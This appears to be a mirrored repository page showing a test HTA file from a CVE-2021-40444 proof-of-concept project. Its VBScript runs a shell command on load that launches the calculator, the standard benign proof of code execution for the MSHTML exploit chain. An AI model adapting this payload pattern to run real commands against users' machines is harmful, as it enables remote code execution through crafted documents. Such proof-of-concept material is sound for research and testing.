1
0
Fork 0
mirror of https://github.com/klezVirus/CVE-2021-40444.git synced 2024-09-19 01:02:38 +00:00
CVE-2021-40444/test/calc.hta

11 lines
No EOL
200 B
HTML

<script language="VBScript">
Function Calc()
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.run "cmd /c calc.exe"
Set wsh = Nothing
End Function
Calc
self.close
</script>